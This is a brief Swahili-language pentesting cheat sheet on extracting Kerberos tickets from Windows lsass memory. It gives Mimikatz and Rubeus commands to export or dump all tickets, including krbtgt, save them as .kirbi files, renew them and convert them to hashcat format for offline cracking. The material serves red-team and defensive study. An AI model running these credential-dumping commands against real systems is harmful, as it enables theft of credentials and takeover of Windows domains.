Harvesting tickets from Windows

Reading time: 2 minutes

Tiketi katika Windows zinadhibitiwa na kuhifadhiwa na mchakato wa lsass (Local Security Authority Subsystem Service), ambao unawajibika kwa kushughulikia sera za usalama. Ili kutoa tiketi hizi, ni muhimu kuingiliana na mchakato wa lsass. Mtumiaji asiye na usimamizi anaweza kufikia tiketi zao pekee, wakati msimamizi ana haki ya kutoa tiketi zote kwenye mfumo. Kwa shughuli kama hizo, zana za Mimikatz na Rubeus zinatumika sana, kila moja ikitoa amri na kazi tofauti.

Mimikatz

Mimikatz ni zana yenye uwezo ambayo inaweza kuingiliana na usalama wa Windows. Inatumika sio tu kwa kutoa tiketi bali pia kwa shughuli nyingine mbalimbali zinazohusiana na usalama.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus ni chombo kilichoundwa mahsusi kwa mwingiliano na usimamizi wa Kerberos. Kinatumika kwa ajili ya uchimbaji wa tiketi na usimamizi, pamoja na shughuli nyingine zinazohusiana na Kerberos.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Wakati wa kutumia amri hizi, hakikisha kubadilisha sehemu za nafasi kama <BASE64_TICKET> na <luid> na tiketi halisi ya Base64 iliyokodishwa na Kitambulisho cha Logon mtawalia. Zana hizi zinatoa kazi nyingi za kusimamia tiketi na kuingiliana na mifumo ya usalama ya Windows.

Marejeo

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/